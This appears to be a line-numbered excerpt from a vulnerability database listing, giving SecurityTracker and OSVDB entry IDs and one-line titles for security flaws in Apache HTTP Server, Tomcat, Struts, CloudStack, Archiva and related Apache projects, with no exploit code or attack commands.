16164| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
16165| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
16166| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
16167| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16168| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16169| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
16170| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
16171| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
16172| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
16173| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
16174| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
16175| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
16176| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
16177| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
16178| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
16179| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
16180| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
16181| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
16182| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
16183| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
16184| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
16185|
16186| OSVDB - http://www.osvdb.org:
16187| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
16188| [96077] Apache CloudStack Global Settings Multiple Field XSS
16189| [96076] Apache CloudStack Instances Menu Display Name Field XSS
16190| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
16191| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
16192| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
16193| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
16194| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
16195| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
16196| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
16197| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
16198| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
16199| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16200| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
16201| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
16202| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
16203| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
16204| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16205| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
16206| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
16207| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
16208| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
16209| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
16210| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
16211| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
16212| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
16213| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
16214| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
16215| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
16216| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
16217| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
16218| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
16219| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
16220| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
16221| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
16222| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
16223| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
16224| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
16225| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
16226| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
16227| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
16228| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
16229| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
16230| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
16231| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
16232| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
16233| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
16234| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
16235| [94279] Apache Qpid CA Certificate Validation Bypass
16236| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
16237| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
16238| [94042] Apache Axis JAX-WS Java Unspecified Exposure
16239| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
16240| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
16241| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
16242| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
16243| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
16244| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
16245| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
16246| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
16247| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
16248| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
16249| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
16250| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
16251| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
16252| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
16253| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
16254| [93541] Apache Solr json.wrf Callback XSS
16255| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
16256| [93521] Apache jUDDI Security API Token Session Persistence Weakness
16257| [93520] Apache CloudStack Default SSL Key Weakness
16258| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
16259| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
16260| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
16261| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
16262| [93515] Apache HBase table.jsp name Parameter XSS
16263| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
16264| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
16265| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
16266| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
16267| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
16268| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
16269| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
16270| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
16271| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
16272| [93252] Apache Tomcat FORM Authenticator Session Fixation
16273| [93172] Apache Camel camel/endpoints/ Endpoint XSS
16274| [93171] Apache Sling HtmlResponse Error Message XSS
16275| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
16276| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
16277| [93168] Apache Click ErrorReport.java id Parameter XSS
16278| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
16279| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
16280| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
16281| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
16282| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
16283| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
16284| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
16285| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
16286| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
16287| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
16288| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
16289| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
16290| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
16291| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
16292| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
16293| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
16294| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
16295| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
16296| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
16297| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
16298| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
16299| [93144] Apache Solr Admin Command Execution CSRF
16300| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
16301| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
16302| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
16303| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
16304| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
16305| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
16306| [92748] Apache CloudStack VM Console Access Restriction Bypass
16307| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
16308| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
16309| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
16310| [92706] Apache ActiveMQ Debug Log Rendering XSS
16311| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16312| [92270] Apache Tomcat Unspecified CSRF
16313| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16314| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16315| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16316| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16317| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16318| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16319| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16320| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16321| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16322| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16323| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16324| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16325| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16326| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16327| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16328| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16329| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16330| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16331| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16332| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16333| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
16334| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16335| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16336| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16337| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16338| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16339| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16340| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16341| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16342| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16343| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16344| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
16345| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16346| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16347| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16348| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16349| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16350| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16351| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16352| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16353| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16354| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16355| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16356| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16357| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16358| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16359| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16360| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16361| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16362| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16363| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16364| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16365| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
16366| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
16367| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
16368| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
16369| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
16370| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
16371| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
16372| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
16373| [86901] Apache Tomcat Error Message Path Disclosure
16374| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
16375| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
16376| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
16377| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
16378| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
16379| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
16380| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
16381| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
16382| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
16383| [85430] Apache mod_pagespeed Module Unspecified XSS
16384| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
16385| [85249] Apache Wicket Unspecified XSS
16386| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
16387| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
16388| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
16389| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
16390| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
16391| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
16392| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
16393| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
16394| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
16395| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
16396| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
16397| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
16398| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
16399| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
16400| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
16401| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
16402| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
16403| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
16404| [83339] Apache Roller Blogger Roll Unspecified XSS
16405| [83270] Apache Roller Unspecified Admin Action CSRF
16406| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
16407| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
16408| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
16409| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
16410| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
16411| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
16412| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
16413| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
16414| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
16415| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
16416| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
16417| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
16418| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
16419| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
16420| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
16421| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
16422| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
16423| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
16424| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
16425| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
16426| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
16427| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
16428| [80300] Apache Wicket wicket:pageMapName Parameter XSS
16429| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
16430| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
16431| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
16432| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
16433| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
16434| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
16435| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
16436| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
16437| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
16438| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
16439| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
16440| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
16441| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
16442| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
16443| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
16444| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
16445| [78331] Apache Tomcat Request Object Recycling Information Disclosure
16446| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
16447| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
16448| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
16449| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
16450| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
16451| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
16452| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
16453| [77593] Apache Struts Conversion Error OGNL Expression Injection
16454| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
16455| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
16456| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
16457| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
16458| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
16459| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
16460| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
16461| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
16462| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
16463| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
16464| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
16465| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
16466| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
16467| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
16468| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
16469| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
16470| [74725] Apache Wicket Multi Window Support Unspecified XSS
16471| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
16472| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
16473| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
16474| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
16475| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
16476| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
16477| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
16478| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
16479| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
16480| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
16481| [73644] Apache XML Security Signature Key Parsing Overflow DoS
16482| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
16483| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
16484| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
16485| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
16486| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
16487| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
16488| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
16489| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
16490| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
16491| [73154] Apache Archiva Multiple Unspecified CSRF
16492| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
16493| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
16494| [72238] Apache Struts Action / Method Names <
16495| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
16496| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
16497| [71557] Apache Tomcat HTML Manager Multiple XSS
16498| [71075] Apache Archiva User Management Page XSS
16499| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
16500| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
16501| [70924] Apache Continuum Multiple Admin Function CSRF
16502| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
16503| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
16504| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
16505| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
16506| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
16507| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
16508| [69520] Apache Archiva Administrator Credential Manipulation CSRF
16509| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
16510| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
